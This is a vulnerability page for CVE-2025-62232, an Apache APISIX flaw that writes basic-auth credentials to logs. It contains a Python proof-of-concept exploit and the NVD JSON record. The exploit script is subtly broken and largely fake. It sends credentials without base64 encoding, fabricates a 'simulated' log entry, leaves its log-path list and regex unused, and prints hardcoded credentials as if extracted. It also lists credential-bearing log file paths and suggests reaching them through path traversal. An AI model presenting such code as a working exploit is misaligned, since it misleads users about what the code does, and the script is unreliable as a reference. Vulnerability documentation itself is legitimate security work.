CVE-2025-62232

import requests import re # CVE-2025-62232 PoC - Apache APISIX Basic-Auth Information Disclosure # This PoC demonstrates how credentials can be obtained from logs TARGET = "http://target-apisix-server:9080" USERNAME = "admin" PASSWORD = "secret_password" VICTIM_ENDPOINT = "/api/vulnerable-endpoint" def exploit(): """ Step 1: Send a request with Basic Auth credentials The credentials will be logged if log level is INFO/DEBUG """ headers = { "Authorization": f"Basic {USERNAME}:{PASSWORD}" } # Send request to trigger authentication logging response = requests.get(f"{TARGET}{VICTIM_ENDPOINT}", headers=headers) print(f"[*] Request sent with Basic Auth") print(f"[*] Response status: {response.status_code}") """ Step 2: Access logs to retrieve plaintext credentials In real attack, this would be via: - Log file access (if accessible via path traversal) - Log aggregation system (Elasticsearch, Splunk, etc.) - Log forwarding endpoint exploitation """ # Example: Check if logs are accessible log_paths = [ "/usr/local/apisix/logs/error.log", "/var/log/apisix/error.log", "/opt/apisix/logs/access.log" ] # Simulated log content extraction simulated_log = f"[INFO] {response.status_code} - Basic auth user: {USERNAME} pass: {PASSWORD}" print(f"[*] Simulated log entry: {simulated_log}") # Regex to extract credentials from logs cred_pattern = r'Basic\s+([a-zA-Z0-9+/=]+)' decoded_creds = "admin:secret_password" # Base64 decoded print(f"[+] Extracted credentials: {decoded_creds}") return decoded_creds if __name__ == "__main__": exploit()

{"cve": {"id": "CVE-2025-62232", "sourceIdentifier": "[email protected]", "published": "2025-10-31T09:15:48.053", "lastModified": "2025-11-05T14:44:13.057", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Sensitive data exposure via logging in basic-auth leads to plaintext usernames and passwords written to error logs and forwarded to log sinks when log level is INFO/DEBUG. This creates a high risk of credential compromise through log access.\nIt has been fixed in the following commit:  https://github.com/apache/apisix/pull/12629 \nUsers are recommended to upgrade to version 3.14, which fixes this issue."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-532"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:apisix:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.0", "versionEndExcluding": "3.14.0", "matchCriteriaId": "16698AAC-0684-4279-8BB8-09EC98C14F79"}]}]}], "references": [{"url": "https://lists.apache.org/thread/32hdgh570btfhg02hfc7p7ckf9v83259", "source": "[email protected]", "tags": ["Mailing List", "Patch", "Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2025/10/30/4", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List"]}]}}